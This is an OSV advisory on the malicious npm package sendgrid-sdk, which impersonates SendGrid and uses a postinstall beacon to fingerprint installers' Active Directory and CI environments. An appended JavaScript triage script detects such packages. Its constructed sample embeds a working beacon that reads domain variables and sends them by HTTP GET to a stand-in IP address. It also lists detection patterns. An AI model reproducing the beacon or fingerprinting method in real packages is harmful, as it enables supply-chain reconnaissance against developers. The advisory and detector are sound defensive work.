sendgrid-sdk@0.2.4

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5572

Ecosystem

npm

Summary

Package impersonates the official SendGrid npm packages (@sendgrid/*) but ships no SDK functionality: index.js exports an empty object. Its sole purpose is a postinstall recon beacon. On npm install, postinstall.js collects extensive installer-side identifiers — hostname, reverse-DNS FQDN, OS user, USERPROFILE, Active Directory domain (USERDNSDOMAIN, USERDOMAIN, LOGONSERVER), proxy/VPN/ZScaler environment signals, OneDrive corporate flag, install working directory, and CI repository identifiers (GitHub/GitLab/CircleCI/Travis/Bitbucket/Azure/Jenkins URLs and the npm registry) — and transmits them via plain HTTP GET to http://46.224.67.169:3000/ping with each field as a query parameter (pkg, addomain, fullpath, etc.). The combination of name impersonation, an empty SDK surface, and unsolicited fingerprinting of corporate AD/CI environments sent to a bare-IP HTTP endpoint is recon staging for follow-on supply-chain or phishing attacks. The README framing this as a "honeypot" does not constitute installer consent: the package is published to the public npm registry, where any developer mistyping the SendGrid package name will trigger the beacon.

Source: amazon-inspector (08f1d48bc557c6afa69c74455fe35f34ed0992082dc30fc09d032523d2329f63)
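A defender-side triage check for the indicators this report lists, added here as an example and not the OSV or Amazon Inspector detection code. It models an unpacked package as its package.json plus a map of file contents, then flags install-time lifecycle hooks, a lookalike name for a scoped official package, a main module that exports nothing, raw-IP HTTP URLs, reads of the fingerprinting environment variables named above, and use of network modules. The indicator lists, the brand table and the three sample packages are constructed assumptions; the verdict logic treats an install hook on its own as review-worthy rather than blocking, because native addons legitimately build at install time.

```javascript
// Added example (not the OSV or Amazon Inspector detection logic): static triage
// of an unpacked npm package for install-time fingerprinting beacons of the kind
// described in this report. Indicator lists and samples are constructed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
// Variables the report says the beacon harvests (AD, proxy, CI identity); assumed list.
const FINGERPRINT_ENV = new Set([
  'USERPROFILE', 'USERDNSDOMAIN', 'USERDOMAIN', 'LOGONSERVER', 'HTTPS_PROXY',
  'OneDriveCommercial', 'GITHUB_REPOSITORY', 'CI_PROJECT_URL', 'CIRCLE_REPOSITORY_URL',
  'TRAVIS_REPO_SLUG', 'BITBUCKET_GIT_HTTP_ORIGIN', 'BUILD_REPOSITORY_URI', 'GIT_URL',
]);
// Brands whose official packages are scoped; an unscoped name containing the
// brand is a lookalike candidate. Only the case from this report is listed.
const SCOPED_BRANDS = { sendgrid: '@sendgrid/' };

const RAW_IP_HTTP = /\bhttp:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?[^\s'"`]*/g;
const ENV_READ = /process\.env(?:\.([A-Za-z_]\w*)|\[['"]([A-Za-z_]\w*)['"]\])/g;
const NET_USE = /require\(['"](?:node:)?(?:https?|net|dgram)['"]\)|\bfetch\s*\(|\baxios\b/;
const EMPTY_EXPORT = /module\.exports\s*=\s*\{\s*\}/;

function triagePackage(pkg) {
  const findings = [];
  const meta = pkg.packageJson || {};
  const scripts = meta.scripts || {};
  const files = pkg.files || {};
  const name = meta.name || '';

  // 1. Lifecycle hooks that run code at install time.
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] === 'string') {
      findings.push({ kind: 'install-hook', detail: `${hook}: ${scripts[hook]}` });
    }
  }
  // 2. Name impersonation of a scoped official package.
  for (const [brand, scope] of Object.entries(SCOPED_BRANDS)) {
    if (!name.startsWith(scope) && name.toLowerCase().includes(brand)) {
      findings.push({ kind: 'name-lookalike', detail: `${name} resembles ${scope}*` });
    }
  }
  // 3. A main module that exports nothing: no SDK surface behind the name.
  const mainFile = meta.main || 'index.js';
  if (files[mainFile] !== undefined && EMPTY_EXPORT.test(files[mainFile])) {
    findings.push({ kind: 'empty-main', detail: mainFile });
  }
  // 4. Source-level indicators in every JavaScript file of the package.
  for (const [file, src] of Object.entries(files)) {
    if (!file.endsWith('.js')) continue;
    for (const m of src.matchAll(RAW_IP_HTTP)) {
      findings.push({ kind: 'raw-ip-http', detail: `${file}: ${m[0]}` });
    }
    const harvested = [...src.matchAll(ENV_READ)]
      .map((m) => m[1] || m[2]).filter((v) => FINGERPRINT_ENV.has(v));
    if (harvested.length) {
      findings.push({ kind: 'fingerprint-env', detail: `${file}: ${[...new Set(harvested)].join(', ')}` });
    }
    if (NET_USE.test(src)) findings.push({ kind: 'network-use', detail: file });
  }

  // An install hook alone is 'review' (native addons legitimately build on install);
  // an install hook plus beacon indicators is 'block'. Beacons that fire at
  // require() time instead of install time are out of scope for this check.
  const kinds = new Set(findings.map((f) => f.kind));
  let verdict = 'allow';
  if (kinds.has('install-hook')) {
    const beacon = kinds.has('raw-ip-http') ||
      (kinds.has('network-use') && kinds.has('fingerprint-env'));
    verdict = beacon ? 'block' : 'review';
  }
  return { name, verdict, findings };
}

// Constructed sample modelled on the report (not the real package contents);
// 203.0.113.10 is RFC 5737 documentation space, not the endpoint in the report.
const SAMPLE_BEACON = {
  packageJson: { name: 'sendgrid-sdk', main: 'index.js', scripts: { postinstall: 'node postinstall.js' } },
  files: {
    'index.js': 'module.exports = {};\n',
    'postinstall.js': "const os = require('os');\n" +
      "const q = 'pkg=sendgrid-sdk&host=' + os.hostname() + '&addomain=' +\n" +
      "  process.env.USERDNSDOMAIN + '&logon=' + process.env['LOGONSERVER'];\n" +
      "require('http').get('http://203.0.113.10:3000/ping?' + q);\n",
  },
};
// Constructed benign package: an install hook for a native build, nothing else.
const SAMPLE_NATIVE = {
  packageJson: { name: 'fast-hash-addon', main: 'lib/index.js', scripts: { install: 'node-gyp rebuild' } },
  files: { 'lib/index.js': "module.exports = require('./build/Release/addon.node');\n" },
};
// Constructed package with no install hook at all.
const SAMPLE_CLEAN = {
  packageJson: { name: 'tiny-add', main: 'index.js', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = { add: (a, b) => a + b };\n' },
};

for (const pkg of [SAMPLE_BEACON, SAMPLE_NATIVE, SAMPLE_CLEAN]) {
  const r = triagePackage(pkg);
  console.log(`${r.name}: ${r.verdict}`, r.findings.map((f) => f.kind).join(' '));
}
```

In a CI gate this would run over every package directory that a lockfile resolves to, with 'block' failing the PR and 'review' routing the package to a human; the raw-IP URL rule is the strongest single signal here because legitimate SDKs talk to hostnames, while the env-plus-network combination catches the same behaviour when the endpoint is a domain.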
